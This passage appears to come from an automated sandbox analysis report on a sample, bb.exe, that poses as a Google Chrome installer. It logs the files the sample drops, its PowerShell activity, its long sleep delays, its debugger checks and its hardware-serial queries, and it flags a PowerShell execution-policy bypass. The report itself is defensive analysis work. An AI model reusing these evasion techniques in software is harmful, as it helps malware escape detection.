            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Desktop\bb.exe TID: 6588Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 6656 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 1819 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep count: 5427 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep count: 992 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1760Thread sleep count: 996 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6656Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1819Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5427
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 992
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 996
            Source: C:\Users\user\Desktop\bb.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-10870
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2EB2.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2FCF.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ExternalUICleaner.dllJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI300E.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F10.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIFEB8.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiF4D1.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI438A.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI305E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIFC17.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIFBD7.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2E63.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.aiuiJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F9F.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\ProgramData\Caphyon\Advanced Installer\{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}\Google Chrome.exeJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI43F8.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\lzmaextractor.dllJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F50.tmpJump to dropped file
            Source: C:\Users\user\Desktop\bb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi269F.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmlJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xamlJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1Jump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.0000000005353000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapterRdma
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set-VMNetworkAdapterVlan
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q(Set-VmNetworkAdapterRoutingDomainMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VmNetworkAdapterIsolation
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Disconnect-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set-VMNetworkAdapterTeamMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Connect-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-VMNetworkAdapterExtendedAcl
            Source: bb.exe, 00000000.00000003.215415234.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.322125801.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.216782817.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.215380258.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.321333713.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319824260.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.328335115.00000000059D6000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.232347472.00000000059D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q+Remove-VMNetworkAdapterRoutingDomainMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-VMNetworkAdapterAcl
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapterTeamMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapterIsolation
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q"Remove-VMNetworkAdapterTeamMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q(Get-VMNetworkAdapterRoutingDomainMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-VMScsiController
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q)Get-VMNetworkAdapterFailoverConfiguration
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q"Remove-VMNetworkAdapterExtendedAcl
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set-VMNetworkAdapterRdma
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q(Add-VmNetworkAdapterRoutingDomainMapping
            Source: powershell.exe, 00000008.00000002.269321572.0000000005353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6qKC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapterAcl
            Source: powershell.exe, 00000008.00000002.269321572.0000000005353000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-VlB6q
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Rename-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapterVlan
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set-VMNetworkAdapterIsolation
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6qOC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q(Add-VMNetworkAdapterRoutingDomainMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q(Set-VMNetworkAdapterRoutingDomainMapping
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-VMNetworkAdapterAcl
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapter
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-VMScsiController
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set-VmNetworkAdapterIsolation
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $6q)Set-VMNetworkAdapterFailoverConfiguration
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMNetworkAdapterExtendedAcl
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMScsiController
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00C9F926 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_00C9F926
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E8A090 mov eax, dword ptr fs:[00000030h]4_2_00E8A090
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E8A04C mov eax, dword ptr fs:[00000030h]4_2_00E8A04C
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E7B54A mov ecx, dword ptr fs:[00000030h]4_2_00E7B54A
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E6F583 IsDebuggerPresent,OutputDebugStringW,4_2_00E6F583
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00CA1000 SysFreeString,SysFreeString,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysFreeString,4_2_00CA1000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E70424 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00E70424
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E74FE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E74FE3

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
